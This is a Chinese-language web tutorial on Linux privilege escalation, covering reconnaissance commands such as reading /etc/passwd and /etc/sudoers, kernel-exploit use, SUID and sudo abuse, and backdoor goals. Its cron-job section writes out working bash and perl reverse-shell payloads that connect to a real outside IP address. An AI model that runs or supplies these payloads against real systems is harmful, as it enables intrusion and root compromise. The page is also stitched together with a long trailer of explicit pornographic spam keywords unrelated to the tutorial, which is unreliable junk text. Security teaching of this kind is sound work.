成人怡红院-成人怡红院视频在线观看-成人影视大全-成人影院203nnxyz-美女毛片在线看-美女免费黄

站長資訊網(wǎng)
最全最豐富的資訊網(wǎng)站

linux提權(quán)是什么意思

提權(quán)指的是低權(quán)限用戶利用各種合法的或非法的手段獲取到了高于本用戶的系統(tǒng)權(quán)限;Linux提權(quán)一般是指獲取root用戶權(quán)限的操作過程。Linux提權(quán)的本質(zhì)一方面是信息收集,另一方面是對內(nèi)核漏洞的掌握情況;提權(quán)是否成功的關(guān)鍵是信息收集是否完整。

linux提權(quán)是什么意思

本教程操作環(huán)境:linux7.3系統(tǒng)、Dell G3電腦。

linux提權(quán)概念介紹

提權(quán)是什么

提權(quán)指的是低權(quán)限用戶利用各種合法的或非法的手段獲取到了高于本用戶的系統(tǒng)權(quán)限。

詳細來說,就是指利用操作系統(tǒng)或應(yīng)用軟件中的程序漏洞、設(shè)計缺陷或配置疏忽來獲取對應(yīng)用程序或用戶來說受保護資源的高級訪問權(quán)限。其結(jié)果是,應(yīng)用程序可以獲取比應(yīng)用程序開發(fā)者或系統(tǒng)管理員預期的更高的特權(quán),從而可以執(zhí)行授權(quán)的動作。

Linux提權(quán)一般是指獲取root用戶權(quán)限的操作過程。

Linux提權(quán)目的

提權(quán)操作有風險為什么還要進行提權(quán)?什么情況下需要進行提權(quán)?獲取高權(quán)限之后可以做什么?

通過命令執(zhí)行漏洞獲取的一個反彈shell或是通過Web漏洞獲取了一個Webshell后,一般情況下權(quán)限都較低。在執(zhí)行一些重要敏感的操作或是對重要的文件進行修改時無法正常進行,便需要進行提權(quán)。Linux中安裝的數(shù)據(jù)庫、中間件等一般都不是以root用戶啟動的,通過數(shù)據(jù)庫或是中間件獲取到的權(quán)限是是低權(quán)限的。

獲取一個root權(quán)限是每一個黑客的夢想。

  • 讀取寫入服務(wù)器中的重要文件:
    • 修改root密碼
    • 替換系統(tǒng)命令
  • 在系統(tǒng)中放置更為隱蔽的后門:
    • ping后門
    • Rootkit
  • 保證服務(wù)器重啟之后權(quán)限仍在:
    • 內(nèi)存后門

Linux提權(quán)本質(zhì)

Linux提權(quán)的本質(zhì)一方面是信息收集,另一方面是對內(nèi)核漏洞的掌握情況。

Linux信息收集

任何提權(quán)的第一步操作一定是對操作系統(tǒng)進行信息收集。提權(quán)是否成功的關(guān)鍵是信息收集是否完整。

  • 內(nèi)核設(shè)備信息:

    • uname -a 打印所有可用的系統(tǒng)信息
    • uname -r 內(nèi)核版本
    • uname -n 系統(tǒng)主機名。
    • uname -m 查看系統(tǒng)內(nèi)核架構(gòu)(64位/32位)
    • hostname 系統(tǒng)主機名
    • cat /proc/version 內(nèi)核信息
    • cat /etc/*-release 分發(fā)信息
    • cat /etc/issue 分發(fā)信息
    • cat /proc/cpuinfo CPU信息
  • 用戶和群組信息:

    • cat /etc/passwd 列出系統(tǒng)上的所有用戶
    • cat /etc/group 列出系統(tǒng)上的所有組
    • grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超級用戶賬戶
    • whoami 查看當前用戶
    • w 誰目前已登錄,他們正在做什么
    • last 最后登錄用戶的列表
    • lastlog 所有用戶上次登錄的信息
    • lastlog -u %username% 有關(guān)指定用戶上次登錄的信息
    • lastlog |grep -v "Never" 以前登錄用戶的信息
  • 用戶和權(quán)限信息:

    • whoami 當前用戶名
    • id 當前用戶信息
    • cat /etc/sudoers 誰被允許以root身份執(zhí)行
    • sudo -l 當前用戶可以以root身份執(zhí)行操作
  • 環(huán)境系統(tǒng)變量信息:

    • env 顯示環(huán)境變量
    • set 現(xiàn)實環(huán)境變量
    • echo %PATH 路徑信息
    • history 顯示當前用戶的歷史命令記錄
    • pwd 輸出工作目錄
    • cat /etc/profile 顯示默認系統(tǒng)變量
    • cat /etc/shells 顯示可用的shell

內(nèi)核漏洞提權(quán)

內(nèi)核漏洞提權(quán)指的是普通用戶訪問操作系統(tǒng)內(nèi)核,利用內(nèi)核漏洞將權(quán)限提高為root權(quán)限,一般首先需要知曉操作系統(tǒng)的內(nèi)核,內(nèi)核的版本等信息,再尋找內(nèi)核漏洞的EXP進行提權(quán)

linux常用查看系統(tǒng)信息命令  uname -a 查看系統(tǒng)全部信息 uname -r 查看內(nèi)核版本 cat /proc/version 查看內(nèi)核信息 cat /etc/*-realease 查看CentOS版本 cat /etc/issue 查看Ubuntu版本 cat /etc/redhat-release 查看RedHat版本 env 查看環(huán)境變量 echo $PATH 查看當前環(huán)境變量 awk -F: '($3==0){print $1}' /etc/passwd 查找UID為0的用戶 find / -user root -perm -4000 -exec ls -ldb {} ;  查找設(shè)置了SUID的文件
登錄后復制

例子:

1)查看系統(tǒng)的內(nèi)核版本

linux提權(quán)是什么意思

2)使用kali的searchsploit尋找對應(yīng)的內(nèi)核漏洞或網(wǎng)上尋找相應(yīng)的內(nèi)核漏洞

linux提權(quán)是什么意思

3)使用gcc將C語言程序編譯成可執(zhí)行文件,上傳至靶機,執(zhí)行即可提權(quán)至root權(quán)限

Linux其他提權(quán)方法

1、計劃任務(wù)提權(quán)

利用原理:

  • 當 /bin/sh指向/bin/dash的時候(ubuntu默認這樣,當前的靶機也是這樣),反彈shell用bash的話得這樣彈: * * * * * root bash -c "bash -i >&/dev/tcp/106.13.124.93/2333 0>&1"
    這樣彈shell的時候不知道為什么很慢,耐心等等
  • */1 * * * * root perl -e 'use Socket;(i="106.13.124.93";)p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in((p,inet_aton()i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2、利用SUID提權(quán)

  • SUID概念:SUID(設(shè)置用戶ID)是賦予文件的一種權(quán)限,它會出現(xiàn)在文件擁有者權(quán)限的執(zhí)行位上,具有這種權(quán)限的文件會在其執(zhí)行時,使調(diào)用者暫時獲得該文件擁有者的權(quán)限。SUID可以讓調(diào)用者以文件擁有者的身份運行該文件,所以我們利用SUID提權(quán)的思路就是運行root用戶所擁有的SUID的文件,那么我們運行該文件的時候就得獲得root用戶的身份了。那么,為什么要給Linux二進制文件設(shè)置這種權(quán)限呢?其實原因有很多,例如,程序ping需要root權(quán)限才能打開網(wǎng)絡(luò)套接字,但執(zhí)行該程序的用戶通常都是由普通用戶,來驗證與其他主機的連通性。

  • SUID提權(quán):什么是suid提權(quán)呢?一個文件,它有s標志,并且他輸入root,那么我們運行這個程序就可以有了root的權(quán)限,并且這個程序還得能執(zhí)行命令,那么我們就能從普通用戶提升到了root權(quán)限了。

  • 在本地查找符合條件的文件。

    • find / -user root -perm -4000 -print 2>/dev/null
    • find / -perm -u=s -type f 2>/dev/null
    • find / -user root -perm -4000 -exec ls -ldb {} ;
  • 常見的可以提權(quán)的程序

    • nmap vim find Bash More Less Nano cp netcat

3、利用SUDO提權(quán)

Linux系統(tǒng)中可以使用sudo執(zhí)行一個只有root才能執(zhí)行的命令,配置文件保存在/etc/sudoers,sudo -l可以列出當前用戶支持sudo的命令。

盡量從代碼層面進行對漏洞的分析。

4、環(huán)境變量提權(quán)

  • 查看當前環(huán)境變量:

    • echo $PATH

5、root權(quán)限運行的服務(wù)

  • 以root的運行的服務(wù),其中包括第三方軟件都可以進行提權(quán)。

贊(0)
分享到: 更多 (0)
?
網(wǎng)站地圖   滬ICP備18035694號-2    滬公網(wǎng)安備31011702889846號
JAPANESE厨房乱TUB偷| 被村长狂躁俩小时玉婷 | 国产精华AV午夜在线观看| 国产精品日本亚洲欧美| 黑人巨大高潮喷水AV| 久久久久久久精品裸体艺术| 男朋友把舌头都伸进我的嘴巴里了| 欧美日韩国产A∨| 水多多凹凸福利视频导航| 五月色综合无码一区二区三区 | 少妇伦子伦情品无吗| 亚瑟国产精品久久| 亚洲最新无码成AV人| AV无码国产在线看免费APP| 日本工口里番H彩色无遮挡全彩 | 麻豆╳╳╳乱女另类| 欧洲无人区卡一卡二卡三| 天天拍夜夜添久久精品| 亚洲精品中文字幕久久久久下载| 中国性猛交ⅩXXX免费看| 亚洲成A人片在线观看中文| 无码少妇xxxx| 熟妇五十路六十路息与子| 亚洲AⅤ永久无码精品三区在线| 亚洲中文字幕日产无码成人片| 97夜夜澡人人爽人人喊中国片| 动漫AV纯肉无码AV在线播放| 精品国产肉丝袜久久| 欧美成年黄网站色视频| 我的初苞被强开了| 永久免费无码Av成人性色AV| 野花高清在线电影观看免费视频| www.内射孕妇网站入口| 国产乱人伦AV在线无码| 麻豆XXXXXX在线观看| 他的舌头探进蜜源毛毛虫说说| 亚洲欧美精品午睡沙发| 啊轻点灬大JI巴太粗太长了网站 | 少妇精品久久久一区二区三区 | 37大但人文艺术A级都市天气| 国产VOYEUR精品偷窥222| 成年免费视频黄网站ZXGK| 产后漂亮奶水人妻| 狠狠色丁香婷婷综合潮喷| 欧美黑人又粗又大久久久| 欧美精品人妻AⅤ在线观视频免费| 婷婷成人五月综合激情| 在线 | 麻豆国产传媒| 国产成人精品福利一区二区三区| 久久久久久亚洲精品| 少妇无码AV无码专区线| 一区二区三区高清AV专区| 国产成人高清精品亚洲| 免费看又黄又爽又猛的视频| 午夜无遮挡男女啪啪免费软件| 999WWW成人免费视频| 国精品产露脸偷拍视频| 人妻中出无码一区二区三区| 亚洲国产一区二区三区| 丁香花在线视频完整版| 久久综合精品国产丝袜长腿| 偷窥 性别 瘾 XXXXX| 99久热RE在线精品99 6热| 狠狠综合久久综合88亚洲| 久久国产精品成人片免费| 美女与野兽在线观看| 无遮挡裸体免费视频尤物| AV无码人妻一区二区三区在线 | 亚州AV无码人妻一区二区三区| TAP TAP下载官方正版| 久久WWW成人免费网站| 四川老妇山边性对白| AV大片在线无码永久免费网址| 狠狠色丁香久久综合| 手机在线观看AV片| 9精产国品一二三产区| 久久国产精品亚洲艾草网| 太太你也不想你丈夫被开除吧| 18禁成年无码免费网站| 精品成人AV一区二区三区| 天堂√在线中文官网在线| 99久久99久久精品国产片| 久久精品国产亚洲AV高清色欲 | 艳妇乳肉豪妇荡乳AV| 国产青草视频在线观看| 日本乱人伦AⅤ精品潮喷| 在线无码免费网站永久| 精品国产V无码大片在线看| 天堂AV男人在线播放| 把老师摁在黑板上做了一节课作文| 久久久久久久精品无码Av少妇| 性VODAFONEWIFI另类| 吃奶呻吟打开双腿做受动态图| 女人扒开腿让男人狂桶30分钟| 亚洲熟女乱色综合一区| 国产山东熟女48嗷嗷叫| 玩丰满少妇XXXXXⅩ性麻| 成人网站在线观看丰满少妇电影 | 少妇人妻好深太紧了A| 把腿张开让老子臊烂你的视频| 男男GAYGAY无套GAY无套| 亚洲中文久久精品无码WW16| 护士的色诱2在线观看免费| 午夜麻豆国产精品无码| 妇女强高潮18ⅩXXX| 加勒比一本HEYZO高清视频| 无码日韩精品一区二区免费暖暖| 亚洲中文字幕无码第一区| 国内综合精品午夜久久资源| 男生女生一起相差差差差| 亚洲系列精品少妇系列50P| 波多野结AV衣东京热无码专区 | 中国东北熟女老太婆内谢| 久久久WWW成人免费毛片| 亚洲精品乱码久久久久66| 黑人精品欧美一区二区蜜桃| 亚洲AV美国AV产亚洲AV图片| 国产乱人伦偷精品视频下| 无码AV天堂一区二区三区| 国产成人涩涩涩视频在线观看| 色天使综合婷婷国产日韩AV| 亚洲午夜福利AV一区二区无码| 精品国产乱码久久久久久蜜桃| 亚洲AV无码国产精品永久一区| 扒开两腿中间缝流白浆在线看| 欧美黑人又大又粗XXXX| 999在线视频精品免费播放观看| 免费日韩无人区码卡二卡3卡| 午夜无码片在线观看影院网址| 国产精华液一区二区区别| 无码人妻AⅤ一区二区三区用会员| 国产精品 高清 尿 小便 嘘嘘| 乌克兰ZOOMKOOL| 国产精品一区二区久久乐下载| 午夜不卡AV免费| 国产又猛又黄又爽| 亚洲国产精品无码久久98| 精东传媒VS天美传媒电影| 亚洲一区二区三区丝袜| 廖承宇做受被C22分钟视频| 8V蜜桃网最新电影| 精品一区二区三区无码免费视频| 亚洲欧洲国产码专区在线观看| 久久青青草原亚洲AV无码麻豆| 西方14147大但人文艺术| 国产无遮挡无码很黄很污很刺激| 亚洲变态另类调教久久久| 久久国产午夜精品理论片| 中国少妇BBWBBW| 欧洲站高端8码特大码47| 短篇公交车高H肉辣全集目录| 婷婷俺也去俺也去官网| 国内揄拍国内精品少妇国语| 野花香日本大全免费观看| 国产成人无码18禁午夜福利网址| 无码一区二区三区在线| 精产国品一二三产品区别视频手机 | 高潮大叫喷水发抖抽搐| 亚洲AV理论在线电影网| 久久久国产成人一区二区| 99久久精品免费看国产| 日日摸夜夜添夜夜添视频| 国产欧美日韩一区二区加勒比| 亚洲日本一区二区三区在线不卡| 乱人伦人妻中文字幕无码| 办公室的交易HD在线观看| 无码人妻精品一区二区蜜桃网站 | 日本人和NEWBALANCE| 国产欧美一区二区三区在线看| 亚洲一区二区无码视频| 欧美精品亚洲精品日韩传电影| 夫妇交换聚会群4P疯狂大战视频| 亚洲AV无码片一区二区三区| 裸睡时一自慰不小心就滑进去啦 | 人人妻人人澡人人爽人人精品浪潮| 国产丰满美女A级毛片| 亚洲色成人WWW永久网站| 欧美天天综合色影久久精品| 国产成人毛片在线视频| 亚洲乱码国产乱码精品精| 欧美XXXXX高潮喷水麻豆| 国产成人18黄网站免费观看| 亚洲男人第一AV网站| 秋霞人妻无码中文字幕| 国产午夜视频在线观看720P| 在线天堂资源WWW在线中文| 少妇高潮惨叫喷水正在播放| 精品少妇人妻Av免费久久农村| JAPAN丰满人妻VIDEOS| 性BBBBBB裸体BBBBB开| 男男av在线播放| 国产精品一区二区久久国产| 中文字幕无码精品三级在线电影| 少妇高潮喷水久久久影院| 久久久久久精品免费免费999| 成人精品一区二区三区| 亚洲人成网线在线播放VA| 日韩精品久久无码中文字幕| 精品无码久久久久久尤物| 波多野结衣人妻厨房大战|